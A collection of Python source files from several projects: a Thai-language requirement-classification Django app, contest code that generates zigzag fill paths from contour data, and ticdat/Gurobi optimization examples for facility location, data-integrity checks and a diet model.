dive_tree_print(i, level + 1)
def dive_tree_compare(node=TreeNode(None), item=(), level=0):
if len(item) == 0:
return 0
if item[level] in [i.data for i in node.children]:
if level + 1 < len(item):
return dive_tree_compare(
node=node.children[[i.data for i in node.children].index(item[level])],
item=item,
level=level + 1
) + 1
return 1
return 0
def create_sample_data(clear_all=False):
if clear_all:
AnalyzedRequirement.objects.all().delete()
data = [
i.replace('\n', '').split(',') for i in open('requirement/data/sample_data.csv', encoding='utf-8')
][1:]
data = [
(AnalyzedRequirement.objects.create(
text=i[0],
priority=int(i[1]),
is_functional=bool(int(i[2]))
), print(i)) for i in data
]
print(data)
```
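A small, self-contained illustration of the prefix-tree scoring that `calculate_score_sample` relies on. The (word, POS-tag) tuples below are invented for the example, and importing `requirement.analysis` assumes the Django project and its data files are in place.

```python
from requirement.analysis import TreeNode, dive_tree_append, dive_tree_compare

# build a tree of tokenized sample requirements (tokens are hypothetical)
root = TreeNode('priority-high samples')
dive_tree_append(node=root, item=(('must', 'XVMM'), ('login', 'VACT')), level=0)
dive_tree_append(node=root, item=(('must', 'XVMM'), ('report', 'NCMN')), level=0)

# score a new requirement by how many leading tokens match a known branch
print(dive_tree_compare(node=root, item=(('must', 'XVMM'), ('login', 'VACT'))))  # 2
print(dive_tree_compare(node=root, item=(('should', 'XVMM'),)))                  # 0
```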
#### File: requirement-classification/requirement/models.py
```python
from django.db import models
from pythainlp.corpus.common import thai_words
from pythainlp.tag import pos_tag
from pythainlp import Tokenizer
THAI_WORDS = set(thai_words())
for i in open('requirement/data/custom_tokenizer.txt', encoding="utf-8"):
THAI_WORDS.add(i.replace('\n', '').strip())
TOKENIZER = Tokenizer(THAI_WORDS)
class AnalyzedRequirement(models.Model):
PRIORITY_CHOICES = (
(0, 'low'),
(1, 'medium'),
(2, 'high'),
)
IS_FUNCTIONAL_CHOICES = (
(False, 'non-functional'),
(True, 'functional'),
)
text = models.TextField(null=False, blank=False)
priority = models.IntegerField(choices=PRIORITY_CHOICES, null=True, blank=True)
is_functional = models.BooleanField(choices=IS_FUNCTIONAL_CHOICES, null=True, blank=True)
def __str__(self):
return '{} ({} | {})'.format(self.text, self.priority, self.is_functional)
def get_words(self):
return TOKENIZER.word_tokenize(self.text)
def get_pos_tag(self):
return pos_tag(self.get_words())
def get_pos_tag_refined(self, remove_list=('NCMN', 'RPRE', 'VACT', 'VATT', 'VSTA')):
return [i for i in self.get_pos_tag() if i[1] not in remove_list and i[0] != ' ']
``` |
{
"source": "812610357/APMCM",
"score": 3
} |
#### File: APMCM/code/a21.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import math
import time
plt.axis("equal")
d = -0.1
inputpath = "./code/graph2.csv"
outputpath = "./code"
length = 0 # 画线总长
times = 0
dots = 0
num = 0
'''
Part 1: find the nesting (parent) relations between outlines
'''
def _min(parentre, cor, data):
return np.min(data[parentre][:, cor])
def _max(parentre, cor, data):
return np.max(data[parentre][:, cor])
def range_judge(i, j, data):
    if _max(i, 0, data) > _max(j, 0, data) and _min(i, 0, data) < _min(j, 0, data) and _max(i, 1, data) > _max(j, 1, data) and _min(i, 1, data) < _min(j, 1, data):  # compare i and j: if one bounding box contains the other, return the inner one; otherwise return -2
return j
elif _max(i, 0, data) < _max(j, 0, data) and _min(i, 0, data) > _min(j, 0, data) and _max(i, 1, data) < _max(j, 1, data) and _min(i, 1, data) > _min(j, 1, data):
return i
else:
return -2
def findparent(data):
    # parent[own index][0: parent index, 1: nesting level]
parent = list([])
for i in range(len(data)):
parent.append([-1, 1])
    for i in range(0, len(data)):  # i, j are outline indices; start searching for parents
for j in range(i+1, len(data)):
if range_judge(i, j, data) != -2:
small_name = range_judge(i, j, data)
big_name = (i if j == small_name else j)
parent[small_name][1] += 1
if range_judge(big_name, parent[small_name][0], data) == big_name or parent[small_name][0] == -1:
                    parent[small_name][0] = big_name  # its own nesting level was already increased by 1
else:
continue
return(parent)
'''
Part 2: offset the outlines inward, discretize them and split the regions
'''
def unit(v):  # normalize to a unit vector
    return(v/np.linalg.norm(v))
def inangle(v1, v2):  # angle between two vectors
    return(math.acos(np.dot(v1, np.transpose(v2)) / (np.linalg.norm(v1)*np.linalg.norm(v2))))
def cross(v1, v2):  # cross product
    return(v1[0]*v2[1]-v2[0]*v1[1])
def ifcross(p1, p2, q1, q2):  # check whether two segments intersect
v11 = q1-p1
v12 = q2-p1
v21 = q1-p2
v22 = q2-p2
if cross(v11, v12)*cross(v21, v22) < 0 and cross(v11, v21)*cross(v12, v22) < 0:
return(1)
else:
return(0)
def drawborder(data):  # offset the outline inward once
data = np.insert(data, data.shape[0], values=data[1, :], axis=0)
data = np.insert(data, 0, values=data[data.shape[0]-3, :], axis=0)
temp = np.array([0, 0])
i = 0
while i < data.shape[0]-2:
v1 = data[i+1, :]-data[i, :]
v2 = data[i+2, :]-data[i+1, :]
u = d/(math.sin(inangle(v1, v2)))
if cross(v1, v2) > 0:
new = data[i+1, :]+(unit(v2)-unit(v1))*u
else:
new = data[i+1, :]-(unit(v2)-unit(v1))*u
temp = np.row_stack((temp, new))
i += 1
temp = np.delete(temp, 0, axis=0)
i = 0
while i < temp.shape[0]-3:
j = i
while j < temp.shape[0]-1:
if ifcross(temp[i, :], temp[i+1, :], temp[j, :], temp[j+1, :]):
temp = np.row_stack((temp[0:i, :], temp[j+1:, :]))
continue
else:
j += 1
i += 1
return(temp)
def getint(data):  # discretize the outline to the working precision
temp = new = np.array([0, 0.])
for i in range(data.shape[0]-1):
x1 = data[i, 0]
y1 = data[i, 1]
x2 = data[i+1, 0]
y2 = data[i+1, 1]
if x1 == x2:
k = math.inf
else:
            k = (y2-y1)/(x2-x1)  # slope via finite difference
if y1//abs(d) < y2//abs(d):
for j in range(1, math.floor(y2//abs(d)-y1//abs(d)+1)):
new[1] = round((y1//abs(d)+j)*abs(d), 1)
new[0] = (new[1]-y1)/k+x1
temp = np.row_stack((temp, new))
else:
if y1//abs(d) > y2//abs(d):
for j in range(0, math.floor(y1//abs(d)-y2//abs(d))):
new[1] = round((y1//abs(d)-j)*abs(d), 1)
new[0] = (new[1]-y1)/k+x1
temp = np.row_stack((temp, new))
temp = np.delete(temp, 0, axis=0)
#plt.plot(temp[:, 0], temp[:, 1], '-o', color='g', markersize=2)
return(temp)
def findmax(data):  # find indices of local maxima
index = np.array([], dtype="int64")
for i in range(-1, data.shape[0]-1):
if data[i, 1] > data[i-1, 1] and data[i, 1] >= data[i+1, 1]:
index = np.append(index, [i], axis=0)
return(index)
def findmin(data):  # find indices of local minima
index = np.array([], dtype="int64")
for i in range(-1, data.shape[0]-1):
if data[i, 1] <= data[i-1, 1] and data[i, 1] < data[i+1, 1]:
index = np.append(index, [i], axis=0)
return(index)
def findex(data):  # collect extremum indices for every outline
index = list([])
for i in range(len(data)):
index.append(np.array([findmax(data[i]), findmin(data[i])]))
return(index)
def findm(data, index):  # get the indices of the global maximum/minimum
temp = list([])
for i in range(len(index)):
if index[i].shape[1] == 1:
temp.append(np.array([index[i][0, 0], index[i][1, 0]]))
continue
maxy = np.max(data[i][:, 1])
miny = np.min(data[i][:, 1])
m = [[], []]
for j in range(index[i].shape[1]):
if data[i][index[i][0, j], 1] == maxy:
m[0] = index[i][0, j]
for j in range(index[i].shape[1]):
if data[i][index[i][1, j], 1] == miny:
m[1] = index[i][0, j]
temp.append(np.array(m))
return(temp)
def divideout(data_out, data_in, divide_in):  # get the split points on the outer boundary
ym = np.array([data_in[divide_in[0], 1],
data_in[divide_in[1], 1]])
divide_out = np.array([], dtype='int16')
for i in [0, 1]:
for j in range(data_out.shape[0]):
if data_out[j, 1] == ym[i] and data_out[j, 0] > data_in[divide_in[0], 0]:
divide_out = np.append(divide_out, [j], axis=0)
break
return(divide_out)
def stackline(data_out, data_in, divide_out, divide_in):  # connect split points of a multiply-connected region
temp1 = np.row_stack(
(data_out[:divide_out[0]+1], data_in[divide_in[0]:divide_in[1]+1], data_out[divide_out[1]:]))
temp2 = np.row_stack(
(data_in[:divide_in[0]], data_out[divide_out[0]+1:divide_out[1]], data_in[divide_in[1]+1:]))
return(list([temp1, temp2]))
def divide1(data, index, parent):  # partition multiply-connected regions
temp = list([])
    for i in range(1, (max(parent[:, 1]+1))//2+1):  # process nesting layer i
        for j in range(parent.shape[0]):  # search for the outer boundaries of layer i
if parent[j, 1] == 2*i-1:
data_out = data[j]
                for k in range(parent.shape[0]):  # search inner boundaries whose outer boundary is j
if parent[k, 0] == j:
data_in = data[k]
                        divide_in = index[k]  # inner split points
                        divide_out = divideout(data_out,  # outer split points
data_in, divide_in)
                        line = stackline(data_out, data_in,  # cross-connect the split points
divide_out, divide_in)
                        data_out = line[0]  # update the outer boundary
                        temp.append(line[1])  # store the inner piece
            temp.append(data_out)  # store the outer piece
return(temp)
def divideline(data, index):  # get the split points of a simply-connected region
line = np.array([0, 0])
for n in [0, 1]:
for i in index[n]:
judge = 0
j = i-2
while j > -0.02*data.shape[0]:
if data[j, 1] == data[i, 1]:
judge += 1
break
j -= 1
if judge == 0:
continue
k = i+2
while k < 0.98*data.shape[0]:
if data[k, 1] == data[i, 1]:
judge += 1
break
k += 1
if judge == 1:
continue
elif n == 0:
line = np.row_stack((line, [j, i]))
else:
line = np.row_stack((line, [i, k]))
line = np.delete(line, 0, axis=0)
return(line)
def dividesub(data, line):  # split the region along the split lines and reconnect the pieces
temp = list([])
while line.shape[0]:
judge = 0
for i in range(1, line.shape[0]):
if line[0, 0] < line[i, 0] < line[0, 1]:
line = np.row_stack((line[i, :], line))
line = np.delete(line, i+1, axis=0)
judge = 1
break
if judge == 0:
temp.append(np.array(data[line[0, 0]+1:line[0, 1], :]))
for j in range(line[0, 0]+1, line[0, 1]):
data[j] = [0, 0]
line = np.delete(line, 0, axis=0)
temp.append(np.array(data[:, :]))
for i in range(len(temp)):
j = 0
while j < temp[i].shape[0]:
if temp[i][j, 0] == temp[i][j, 1] == 0:
temp[i] = np.delete(temp[i], j, axis=0)
continue
j += 1
return(temp)
def divide2(data, index):  # partition simply-connected regions
temp = list([])
for i in range(len(data)):
if index[i].shape[1] > 1:
line = divideline(data[i], index[i])
temp += dividesub(data[i], line)
else:
temp += list([data[i]])
return(temp)
'''
Part 3: generate and export the zigzag fill lines
'''
def writecsv(data):  # export a polyline to csv
global times
dataframe = pd.DataFrame(data={'x': data[:, 0], 'y': data[:, 1]})
dataframe.to_csv(outputpath+f"/zigzag{times}.csv",
index=False, mode='w', sep=',')
pass
def readcsv(path):  # read the outlines from csv
data = list([])
data0 = pd.read_csv(
path, index_col=False, header=2)
j = 0
if data0.dtypes.X != "float64":
for i in range(len(data0.values)):
if "MainCurve" in data0.values[i, 0]:
data += list([np.array(data0.values[j:i, :], dtype='float64')])
j = i+2
data += list([np.array(data0.values[j:len(data0.values), :], dtype='float64')])
for i in range(len(data)):
plt.plot(data[i][:, 0], data[i][:, 1], '-o', color='b', markersize=1)
return(data)
def drawline(data):  # draw the parallel fill lines
global length
global times
global dots
global num
for i in range(len(data)):
line = np.array([0, 0])
area = data[i]
maxy = round(max(area[:, 1]), 1)
miny = round(min(area[:, 1]), 1)
j = miny
while j <= maxy:
index = (np.where(area == j))[0]
temp = area[index, 0]
if round(j/abs(d)+1) % 2:
line = np.row_stack((line, [j, min(temp)]))
line = np.row_stack((line, [j, max(temp)]))
else:
line = np.row_stack((line, [j, max(temp)]))
line = np.row_stack((line, [j, min(temp)]))
j = round(j + abs(d), 1)
line = np.delete(line, 0, axis=0)
line = np.column_stack((line[:, 1], line[:, 0]))
times += 1
writecsv(line)
plt.plot(line[:, 0], line[:, 1], '-', color='r')
num = num+int(line.shape[0]/2)
for j in range(line.shape[0]-1):
length = length + \
math.sqrt((line[j+1, 0]-line[j, 0])**2 +
(line[j+1, 1]-line[j, 1])**2)
dots += 1
i += 1
pass
'''
Main routine
'''
start = time.thread_time()
data = readcsv(inputpath)
for i in range(len(data)):
data[i] = drawborder(data[i])
data[i] = getint(data[i])
parent = np.array(findparent(data))
index = findex(data)
index = findm(data, index)
data = divide1(data, index, parent)
index = findex(data)
data = divide2(data, index)
drawline(data)
end = time.thread_time()
print('Length of curve: %s mm' % length)
print('Number of parallel line: %s' % num)
print('Number of dots: %s' % dots)
print('Running time: %s Seconds' % (end-start))
plt.show()
```
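For reference, a stand-alone check of the segment-intersection test that `drawborder` uses to prune self-intersections after offsetting; it repeats the same cross-product logic as `cross`/`ifcross` above with made-up points.

```python
import numpy as np

def cross(v1, v2):
    return v1[0] * v2[1] - v2[0] * v1[1]

def ifcross(p1, p2, q1, q2):
    v11, v12 = q1 - p1, q2 - p1
    v21, v22 = q1 - p2, q2 - p2
    return cross(v11, v12) * cross(v21, v22) < 0 and cross(v11, v21) * cross(v12, v22) < 0

a, b = np.array([0.0, 0.0]), np.array([2.0, 2.0])
c, e = np.array([0.0, 2.0]), np.array([2.0, 0.0])
print(ifcross(a, b, c, e))  # True: the two diagonals cross at (1, 1)
```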
#### File: APMCM/code/a33.py
```python
import numpy as np
import matplotlib.pyplot as plt
import math
d = 1  # offset vector length (circle radius)
rad = 1  # arc sampling density
def unit(v):  # normalize to a unit vector
    return(v/np.linalg.norm(v))
def cross(v1, v2):  # 2-D cross product
    return(v1[0]*v2[1]-v2[0]*v1[1])
def dot(v1, v2):  # dot product
    return(v1[0]*v2[0]+v1[1]*v2[1])
def angle(v):  # polar angle of a vector
    return(math.atan2(v[1], v[0]))
def vertical(v, d):  # perpendicular vector of length d
    vt = np.array([v[1], -v[0]])
    return(unit(vt)*d)
def f_e_dot(v, head_dot):  # end point from a vector and its start point
    end_dot = [v[0]+head_dot[0], v[1]+head_dot[1]]
    return end_dot
def vec_sita(v, ang, head_dot):  # point from the initial vector, angle α (Δθ step) and the start point
    v_r = [d*math.cos(ang), d*math.sin(ang)]
    return f_e_dot(v_r, head_dot)
plt.axis("equal")
data = np.array([[-3, 2], [-1, 2], [0, 0], [1, 2], [3, 2]])
plt.plot(data[:, 0], data[:, 1], "-")
i = 0
while i < data.shape[0]-2:
temp = np.array([])
v1 = data[i+1, :]-data[i, :]
v2 = data[i+2, :]-data[i+1, :]
if cross(v1, v2) > 0 and dot(v1, v2) < 0:
        # from a vector and a distance, get its perpendicular vector
        vl = vertical(v1, d)  # left perpendicular vector
        vr = vertical(v2, d)  # right perpendicular vector
        a = data[i+1, :]  # the corner vertex
        c1 = [vl[0]+a[0], vl[1]+a[1]]  # first point on the left side
        temp = np.array(c1)
        for ang in np.linspace(angle(vl), angle(vr), num=10):
            # record every point of the arc in temp
temp = np.row_stack((temp, vec_sita(vl, ang, a)))
if temp.shape[0] > 1:
plt.plot(temp[:, 0], temp[:, 1], "-")
i += 1
plt.show()
``` |
{
"source": "8135tao/ticdat",
"score": 3
} |
#### File: expert_section/cog/cogmodel.py
```python
import time
import datetime
import os
import gurobipy as gu
from ticdat import TicDatFactory, Progress, LogFile, Slicer, standard_main, gurobi_env
# ------------------------ define the input schema --------------------------------
# There are three input tables, with 4 primary key fields and 4 data fields.
input_schema = TicDatFactory (
sites = [['Name'],['Demand', 'Center Status']],
distance = [['Source', 'Destination'],['Distance']],
parameters = [["Parameter"], ["Value"]])
# add foreign key constraints
input_schema.add_foreign_key("distance", "sites", ['Source', 'Name'])
input_schema.add_foreign_key("distance", "sites", ['Destination', 'Name'])
# center_status is a flag field which can take one of two string values.
input_schema.set_data_type("sites", "Center Status", number_allowed=False,
strings_allowed=["Can Be Center", "Pure Demand Point"])
# The default data type (non-negative, non-infinite) works for distance and demand
input_schema.set_data_type("sites", "Demand")
input_schema.set_data_type("distance", "Distance")
input_schema.add_parameter("Number of Centroids", default_value=1, inclusive_min=False, inclusive_max=False, min=0,
max=float("inf"), must_be_int=True)
input_schema.add_parameter("MIP Gap", default_value=0.001, inclusive_min=False, inclusive_max=False, min=0,
max=float("inf"), must_be_int=False)
input_schema.add_parameter("Formulation", "Strong", number_allowed=False, strings_allowed=["Weak", "Strong"])
# ---------------------------------------------------------------------------------
# ------------------------ define the output schema -------------------------------
# There are three solution tables, with 4 primary key fields and 1
# data field amongst them.
solution_schema = TicDatFactory(
openings = [['Site'],[]],
assignments = [['Site', 'Assigned To'],[]],
parameters = [["Parameter"], ["Value"]])
# ---------------------------------------------------------------------------------
# ------------------------ create a solve function --------------------------------
def solve(dat, diagnostic_log, error_and_warning_log, progress):
assert isinstance(progress, Progress)
assert isinstance(diagnostic_log, LogFile) and isinstance(error_and_warning_log, LogFile)
assert input_schema.good_tic_dat_object(dat)
assert not input_schema.find_foreign_key_failures(dat)
assert not input_schema.find_data_type_failures(dat)
diagnostic_log.write("COG output log\n%s\n\n" % time_stamp())
error_and_warning_log.write("COG error log\n%s\n\n" % time_stamp())
full_parameters = input_schema.create_full_parameters_dict(dat)
def get_distance(x,y):
if (x,y) in dat.distance:
return dat.distance[x,y]["Distance"]
if (y,x) in dat.distance:
return dat.distance[y,x]["Distance"]
return float("inf")
def can_assign(x, y):
return dat.sites[y]["Center Status"] == "Can Be Center" \
and get_distance(x,y)<float("inf")
unassignables = [n for n in dat.sites if not
any(can_assign(n,y) for y in dat.sites) and
dat.sites[n]["Demand"] > 0]
if unassignables:
# Infeasibility detected. Generate an error table and return None
error_and_warning_log.write("The following sites have demand, but can't be " +
"assigned to anything.\n")
error_and_warning_log.log_table("Un-assignable Demand Points",
[["Site"]] + [[_] for _ in unassignables])
return
useless = [n for n in dat.sites if not any(can_assign(y,n) for y in dat.sites) and
dat.sites[n]["Demand"] == 0]
if useless:
# Log in the error table as a warning, but can still try optimization.
error_and_warning_log.write("The following sites have no demand, and can't serve as the " +
"center point for any assignments.\n")
error_and_warning_log.log_table("Useless Sites", [["Site"]] + [[_] for _ in useless])
progress.numerical_progress("Feasibility Analysis" , 100)
m = gu.Model("cog", env=gurobi_env())
assign_vars = {(n, assigned_to) : m.addVar(vtype = gu.GRB.BINARY,
name = "%s_%s"%(n,assigned_to),
obj = get_distance(n,assigned_to) *
dat.sites[n]["Demand"])
for n in dat.sites for assigned_to in dat.sites
if can_assign(n, assigned_to)}
open_vars = {n : m.addVar(vtype = gu.GRB.BINARY, name = "open_%s"%n)
for n in dat.sites
if dat.sites[n]["Center Status"] == "Can Be Center"}
if not open_vars:
error_and_warning_log.write("Nothing can be a center!\n") # Infeasibility detected.
return
m.update()
progress.numerical_progress("Core Model Creation", 50)
# using ticdat.Slicer instead of tuplelist simply as a matter of taste/vanity
assign_slicer = Slicer(assign_vars)
for n, r in dat.sites.items():
if r["Demand"] > 0:
m.addConstr(gu.quicksum(assign_vars[n, assign_to]
for _, assign_to in assign_slicer.slice(n, "*"))
== 1,
name = "must_assign_%s"%n)
crippledfordemo = full_parameters["Formulation"] == "Weak"
for assigned_to, r in dat.sites.items():
if r["Center Status"] == "Can Be Center":
_assign_vars = [assign_vars[n, assigned_to]
for n,_ in assign_slicer.slice("*", assigned_to)]
if crippledfordemo:
m.addConstr(gu.quicksum(_assign_vars) <=
len(_assign_vars) * open_vars[assigned_to],
name="weak_force_open%s"%assigned_to)
else:
for var in _assign_vars :
m.addConstr(var <= open_vars[assigned_to],
name = "strong_force_open_%s"%assigned_to)
number_of_centroids = full_parameters["Number of Centroids"]
m.addConstr(gu.quicksum(v for v in open_vars.values()) == number_of_centroids,
name= "numCentroids")
m.Params.MIPGap = full_parameters["MIP Gap"]
m.update()
progress.numerical_progress("Core Model Creation", 100)
m.optimize(progress.gurobi_call_back_factory("COG Optimization", m))
progress.numerical_progress("Core Optimization", 100)
if not hasattr(m, "status"):
print("missing status - likely premature termination")
return
for failStr,grbkey in (("inf_or_unbd", gu.GRB.INF_OR_UNBD),
("infeasible", gu.GRB.INFEASIBLE),
("unbounded", gu.GRB.UNBOUNDED)):
if m.status == grbkey:
print("Optimization failed due to model status of %s"%failStr)
return
if m.status == gu.GRB.INTERRUPTED:
error_and_warning_log.write("Solve process interrupted by user feedback\n")
if not all(hasattr(var, "x") for var in open_vars.values()):
error_and_warning_log.write("No solution was found\n")
return
elif m.status != gu.GRB.OPTIMAL:
error_and_warning_log.write("unexpected status %s\n" % m.status)
return
sln = solution_schema.TicDat()
sln.parameters["Lower Bound"] = getattr(m, "objBound", m.objVal)
sln.parameters["Upper Bound"] = m.objVal
diagnostic_log.write('Upper Bound: %g\n' % sln.parameters["Upper Bound"]["Value"])
diagnostic_log.write('Lower Bound: %g\n' % sln.parameters["Lower Bound"]["Value"])
def almostone(x) :
return abs(x-1) < 0.0001
for (n, assigned_to), var in assign_vars.items() :
if almostone(var.x) :
sln.assignments[n,assigned_to] = {}
for n,var in open_vars.items() :
if almostone(var.x) :
sln.openings[n]={}
diagnostic_log.write('Number Centroids: %s\n' % len(sln.openings))
progress.numerical_progress("Full Cog Solve", 100)
return sln
def time_stamp() :
ts = time.time()
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
# ---------------------------------------------------------------------------------
# ------------------------ provide stand-alone functionality ----------------------
def percent_error(lb, ub):
assert lb<=ub
return "%.2f"%(100.0 * (ub-lb) / ub) + "%"
# when run from the command line, will read/write json/xls/csv/db/mdb files
if __name__ == "__main__":
if os.path.exists("cog.stop"):
print("Removing the cog.stop file so that solve can proceed.")
print("Add cog.stop whenever you want to stop the optimization")
os.remove("cog.stop")
class CogStopProgress(Progress):
def mip_progress(self, theme, lower_bound, upper_bound):
super(CogStopProgress, self).mip_progress(theme, lower_bound, upper_bound)
print("%s:%s:%s"%(theme.ljust(30), "Percent Error".ljust(20),
percent_error(lower_bound, upper_bound)))
# return False (to stop optimization) if the cog.stop file exists
return not os.path.exists("cog.stop")
# creating a single argument version of solve to pass to standard_main
def _solve(dat):
# create local text files for logging
with LogFile("output.txt") as out :
with LogFile("error.txt") as err :
solution = solve(dat, out, err, CogStopProgress())
if solution :
print('\n\nUpper Bound : %g' % solution.parameters["Upper Bound"]["Value"])
print('Lower Bound : %g' % solution.parameters["Lower Bound"]["Value"])
print('Percent Error : %s' % percent_error(solution.parameters["Lower Bound"]["Value"],
solution.parameters["Upper Bound"]["Value"]))
return solution
else :
print('\nNo solution')
standard_main(input_schema, solution_schema, _solve)
# ---------------------------------------------------------------------------------
```
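A minimal sketch of driving `solve` directly from Python rather than through `standard_main`; the module name `cogmodel` and the site/distance numbers are assumptions made up for the example.

```python
from ticdat import LogFile, Progress
from cogmodel import input_schema, solve  # module name assumed from the file path

dat = input_schema.TicDat(
    sites={"A": {"Demand": 10, "Center Status": "Can Be Center"},
           "B": {"Demand": 5, "Center Status": "Pure Demand Point"}},
    distance={("A", "A"): {"Distance": 0.0}, ("A", "B"): {"Distance": 3.0}},
    parameters={"Number of Centroids": {"Value": 1}})

with LogFile("output.txt") as out, LogFile("error.txt") as err:
    sln = solve(dat, out, err, Progress())
    if sln:
        print(sorted(sln.openings))
```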
#### File: examples/expert_section/lebron_helper.py
```python
from ticdat import PanDatFactory, standard_main
import lebron
input_schema = lebron.input_schema.clone(clone_factory=PanDatFactory) # requires 0.2.20.4 or later.
from collections import defaultdict
_pks = {t: pks for t, (pks, dfs) in input_schema.schema().items()}
_longest_pk = max(len(pks) for pks in _pks.values())
_fld_names = [f"PK Field {_ + 1}" for _ in range(_longest_pk)]
solution_schema = PanDatFactory(duplicate_rows=[["Table Name"] + _fld_names, []],
data_type_failures=[["Table Name", "Field Name"] + _fld_names, []],
data_row_failures=[["Table Name", "Predicate Name"] + _fld_names, []],
foreign_key_failures =[["Native Table", "Foreign Table", "Mapping"] + _fld_names, []])
def solve(dat):
dups = input_schema.find_duplicates(dat)
duplicate_rows = defaultdict(list)
for table, dup_df in dups.items():
for row in dup_df.itertuples(index=False):
duplicate_rows["Table Name"].append(table)
for f, c in zip(_fld_names, row[:len(_pks[table])]):
duplicate_rows[f].append(c)
for i in range(len(_pks[table]), _longest_pk):
duplicate_rows[_fld_names[i]].append(None)
if duplicate_rows:
return solution_schema.PanDat(duplicate_rows=duplicate_rows)
dt_fails = input_schema.find_data_type_failures(dat)
data_type_failures = defaultdict(list)
for (table, field), dt_fail_df in dt_fails.items():
for row in dt_fail_df.itertuples(index=False):
data_type_failures["Table Name"].append(table)
data_type_failures["Field Name"].append(field)
for f, c in zip(_fld_names, row[:len(_pks[table])]):
data_type_failures[f].append(c)
for i in range(len(_pks[table]), _longest_pk):
data_type_failures[_fld_names[i]].append(None)
if data_type_failures:
return solution_schema.PanDat(data_type_failures=data_type_failures)
dr_fails = input_schema.find_data_row_failures(dat)
data_row_failures = defaultdict(list)
for (table, predicate), dr_fail_df in dr_fails.items():
for row in dr_fail_df.itertuples(index=False):
data_row_failures["Table Name"].append(table)
data_row_failures["Predicate Name"].append(predicate)
for f, c in zip(_fld_names, row[:len(_pks[table])]):
data_row_failures[f].append(c)
for i in range(len(_pks[table]), _longest_pk):
data_row_failures[_fld_names[i]].append(None)
if data_row_failures:
return solution_schema.PanDat(data_row_failures=data_row_failures)
fk_fails = input_schema.find_foreign_key_failures(dat, verbosity="Low")
foreign_key_failures = defaultdict(list)
for (native_table, foreign_table, mapping), fk_fail_df in fk_fails.items():
for row in fk_fail_df.itertuples(index=False):
foreign_key_failures["Native Table"].append(native_table)
foreign_key_failures["Foreign Table"].append(foreign_table)
foreign_key_failures["Mapping"].append(str(mapping))
for f, c in zip(_fld_names, row[:len(_pks[native_table])]):
foreign_key_failures[f].append(c)
for i in range(len(_pks[native_table]), _longest_pk):
foreign_key_failures[_fld_names[i]].append(None)
if foreign_key_failures:
return solution_schema.PanDat(foreign_key_failures=foreign_key_failures)
print("\nlebron_helper won't create a solution, because there are no basic data integrity problems.\n")
print("Go ahead and run lebron on this input data.\n")
if __name__ == "__main__":
standard_main(input_schema, solution_schema, solve)
```
#### File: gurobipy/diet/diet.py
```python
try: # if you don't have gurobipy installed, the code will still load and then fail on solve
import gurobipy as gp
except:
gp = None
from ticdat import TicDatFactory, standard_main
# ------------------------ define the input schema --------------------------------
# There are three input tables, with 4 primary key fields and 4 data fields.
input_schema = TicDatFactory (
categories=[["Name"], ["Min Nutrition", "Max Nutrition"]],
foods=[["Name"], ["Cost"]],
nutrition_quantities=[["Food", "Category"], ["Quantity"]])
# Define the foreign key relationships
input_schema.add_foreign_key("nutrition_quantities", "foods", ["Food", "Name"])
input_schema.add_foreign_key("nutrition_quantities", "categories",
["Category", "Name"])
# Define the data types
input_schema.set_data_type("categories", "Min Nutrition", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=False)
input_schema.set_data_type("categories", "Max Nutrition", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=True)
input_schema.set_data_type("foods", "Cost", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=False)
input_schema.set_data_type("nutrition_quantities", "Quantity", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=False)
# We also want to ensure that Max Nutrition doesn't fall below Min Nutrition
input_schema.add_data_row_predicate(
"categories", predicate_name="Min Max Check",
predicate=lambda row : row["Max Nutrition"] >= row["Min Nutrition"])
# The default-default of zero makes sense everywhere except for Max Nutrition
input_schema.set_default_value("categories", "Max Nutrition", float("inf"))
# ---------------------------------------------------------------------------------
# ------------------------ define the output schema -------------------------------
# There are three solution tables, with 3 primary key fields and 3 data fields.
solution_schema = TicDatFactory(
parameters=[["Parameter"], ["Value"]],
buy_food=[["Food"], ["Quantity"]],
consume_nutrition=[["Category"], ["Quantity"]])
# ---------------------------------------------------------------------------------
# ------------------------ create a solve function --------------------------------
def solve(dat):
"""
core solving routine
:param dat: a good ticdat for the input_schema
:return: a good ticdat for the solution_schema, or None
"""
assert input_schema.good_tic_dat_object(dat)
assert not input_schema.find_foreign_key_failures(dat)
assert not input_schema.find_data_type_failures(dat)
assert not input_schema.find_data_row_failures(dat)
if gp is None: # even if you don't have gurobipy installed, you can still import this file for other uses
print("*****\ngurobipy needs to be installed for this example code to solve!\n*****\n")
mdl = gp.Model("diet")
nutrition = {c: mdl.addVar(lb=n["Min Nutrition"], ub=n["Max Nutrition"], name=c)
for c, n in dat.categories.items()}
# Create decision variables for the foods to buy
buy = {f: mdl.addVar(name=f) for f in dat.foods}
# Nutrition constraints
for c in dat.categories:
mdl.addConstr(gp.quicksum(dat.nutrition_quantities[f, c]["Quantity"] * buy[f]
for f in dat.foods) == nutrition[c],
name=c)
mdl.setObjective(gp.quicksum(buy[f] * c["Cost"] for f, c in dat.foods.items()),
sense=gp.GRB.MINIMIZE)
mdl.optimize()
if mdl.status == gp.GRB.OPTIMAL:
sln = solution_schema.TicDat()
for f,x in buy.items():
if x.x > 0:
sln.buy_food[f] = x.x
for c,x in nutrition.items():
sln.consume_nutrition[c] = x.x
sln.parameters['Total Cost'] = sum(dat.foods[f]["Cost"] * r["Quantity"]
for f, r in sln.buy_food.items())
return sln
# ---------------------------------------------------------------------------------
# ------------------------ provide stand-alone functionality ----------------------
# when run from the command line, will read/write json/xls/csv/db/sql/mdb files
if __name__ == "__main__":
standard_main(input_schema, solution_schema, solve)
# ---------------------------------------------------------------------------------
```
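A minimal sketch of calling `solve` with an in-memory `TicDat` instead of reading files; the food and nutrition numbers are made up, and the module name `diet` is assumed from the file path.

```python
from diet import input_schema, solve  # module name assumed

dat = input_schema.TicDat(
    categories={"calories": {"Min Nutrition": 1800, "Max Nutrition": 2200},
                "protein": {"Min Nutrition": 91}},  # Max Nutrition defaults to +inf
    foods={"hamburger": {"Cost": 2.49}, "milk": {"Cost": 0.89}},
    nutrition_quantities={("hamburger", "calories"): {"Quantity": 410},
                          ("hamburger", "protein"): {"Quantity": 24},
                          ("milk", "calories"): {"Quantity": 100},
                          ("milk", "protein"): {"Quantity": 8}})

sln = solve(dat)
if sln:
    print(sln.parameters["Total Cost"]["Value"])
    print({f: r["Quantity"] for f, r in sln.buy_food.items()})
```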
